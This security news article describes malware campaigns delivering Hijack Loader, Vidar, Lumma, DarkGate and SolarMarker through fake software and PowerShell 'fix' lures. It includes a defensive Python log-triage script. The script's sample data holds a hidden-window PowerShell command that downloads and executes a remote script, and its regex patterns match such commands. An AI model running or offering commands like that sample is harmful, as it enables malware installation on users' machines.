Cybercriminals Use Free Software to Spread Hijack Loader and Vidar Stealer

Cybercriminals are tricking people into downloading free or pirated software to install a malware called Hijack Loader, which then deploys another malware known as Vidar Stealer.

Trellix security researcher Ale Houspanossian said in a report on Monday that the attackers managed to fool users into downloading password-protected archive files containing fake copies of the Cisco Webex Meetings App (ptService.exe).

When users extracted and ran a file named “Setup.exe,” it secretly loaded the malware, leading to the execution of Vidar Stealer.

The attack begins with a RAR archive file containing an executable named “Setup.exe,” which is actually a copy of the Cisco Webex Meetings ptService module.

The campaign stands out for using DLL side-loading techniques to secretly launch Hijack Loader (also known as DOILoader or IDAT Loader). Hijack Loader then uses an AutoIt script to drop Vidar Stealer.

“The malware uses a known method to bypass User Account Control (UAC) and exploits the CMSTPLUA COM interface for gaining higher privileges,” Houspanossian added. “After gaining higher privileges, the malware added itself to Windows Defender’s exclusion list to avoid detection.”

Besides using Vidar Stealer to steal sensitive credentials from web browsers, the attack also installs a cryptocurrency miner on the infected computer.

This information comes after an increase in ClearFake campaigns. These campaigns trick people into running a PowerShell script to fix a fake problem with viewing web pages, as reported by ReliaQuest last month.

The PowerShell script starts Hijack Loader, which then installs Lumma Stealer malware. Lumma Stealer can also download three more pieces of malware, including Amadey Loader, which installs the XMRig miner, and clipper malware to redirect cryptocurrency transactions to the attackers’ wallets.

“We saw Amadey downloading other malware, like a Go-based program believed to be JaskaGO,” said Proofpoint researchers Tommy Madjar, Dusty Miller, and Selena Larson.

Proofpoint also noticed another attack in mid-April 2024, called ClickFix. This attack used fake browser update alerts on compromised sites to spread Vidar Stealer using similar methods involving PowerShell code.

Free Software Lures

Another group using similar tricks in its malicious email campaigns is TA571. It sends emails with HTML attachments that, when opened, show an error message saying “The ‘Word Online’ extension is not installed in your browser.”

The message gives two options: “How to fix” and “Auto-fix.” If the victim selects “How to fix,” a PowerShell command is copied to the clipboard with instructions to run it in a PowerShell terminal. This command installs either an MSI installer or a Visual Basic Script (VBS).

If the victim selects “Auto-fix,” they see files named “fix.msi” or “fix.vbs” in Windows Explorer, using a special protocol to display them.

No matter which option is chosen, running the MSI file installs Matanbuchus, and running the VBS file installs DarkGate.

Other versions of this campaign have also distributed NetSupport RAT, showing that the attackers keep updating their methods even though they need the user to do several steps for the attack to work.

“The legitimate use of the clipboard and the many ways to store malicious code, along with the fact that victims manually run the code without direct links to a file, make it hard to detect these threats,” said Proofpoint.

“Antivirus software and EDRs struggle to inspect clipboard content, so detection and blocking need to happen before the victim sees the malicious HTML or site.”
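Where the clipboard-to-terminal step cannot be blocked up front, the two host-side traces described above still surface in Windows event logs: a Windows Defender exclusion being added (Defender/Operational event 5007) and the pasted PowerShell itself (PowerShell/Operational script block event 4104). The triage below is an added example, not code from the article or from Trellix or Proofpoint; the event IDs and channel names are real Windows ones, but every record, path, URL and value is constructed for the example.

```python
import re

# Constructed sample records (not from the article): field names follow the Windows
# event log, but every path, URL and value below is made up for this example.
SAMPLE_EVENTS = [
    {"id": 4104, "channel": "Microsoft-Windows-PowerShell/Operational",
     "message": "Creating Scriptblock text (1 of 1): Get-ChildItem C:\\Users"},
    {"id": 4104, "channel": "Microsoft-Windows-PowerShell/Operational",
     "message": "Creating Scriptblock text (1 of 1): powershell -w hidden -c "
                "\"iex (iwr http://fix.example.invalid/fix.ps1 -UseBasicParsing)\""},
    {"id": 5007, "channel": "Microsoft-Windows-Windows Defender/Operational",
     "message": "Windows Defender Antivirus Configuration has changed. New value: "
                "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\"
                "C:\\Users\\Public\\ptService.exe = 0x0"},
    {"id": 5007, "channel": "Microsoft-Windows-Windows Defender/Operational",
     "message": "Windows Defender Antivirus Configuration has changed. New value: "
                "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Scan\\ScheduleDay = 0x0"},
]

# Traits of a pasted "fix" command: console hidden from the victim, download and
# execute in one expression, or a base64 payload the victim cannot read.
PASTE_AND_RUN = re.compile(
    r"-w(?:indowstyle)?\s+hidden"
    r"|\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring)\b"
    r"|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    re.IGNORECASE,
)
# A 5007 change whose new value sits under the Exclusions key is an exclusion being
# added; other settings changes (scan schedule, etc.) deliberately do not match.
EXCLUSION_ADDED = re.compile(
    r"\\Exclusions\\(?:Paths|Processes|Extensions)\\(?P<target>[^=]+?)\s*=",
    re.IGNORECASE,
)


def triage(events):
    """Return (rule, detail) pairs, in input order, for every event that matches."""
    findings = []
    for ev in events:
        msg = ev["message"]
        if ev["id"] == 5007 and "Windows Defender" in ev["channel"]:
            m = EXCLUSION_ADDED.search(msg)
            if m:
                findings.append(("defender_exclusion_added", m.group("target").strip()))
        elif ev["id"] == 4104 and "PowerShell" in ev["channel"]:
            m = PASTE_AND_RUN.search(msg)
            if m:
                findings.append(("paste_and_run_scriptblock", m.group(0)))
    return findings
```

Script block logging must be enabled for 4104 to exist at all, and an exclusion added by a legitimate administrator matches just like a malicious one, so the 5007 rule is a review trigger rather than a verdict.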

Meanwhile, eSentire revealed a malware campaign using fake websites that look like Indeed[.]com to spread SolarMarker malware through a document claiming to offer team-building ideas.

“SolarMarker uses search engine optimization (SEO) poisoning to manipulate search results and increase the visibility of fake links,” said the Canadian cybersecurity company.

“The attackers’ use of SEO tactics to direct users to malicious sites shows the importance of being cautious about clicking on search engine results, even if they seem legitimate.”

Source: TheHackerNews
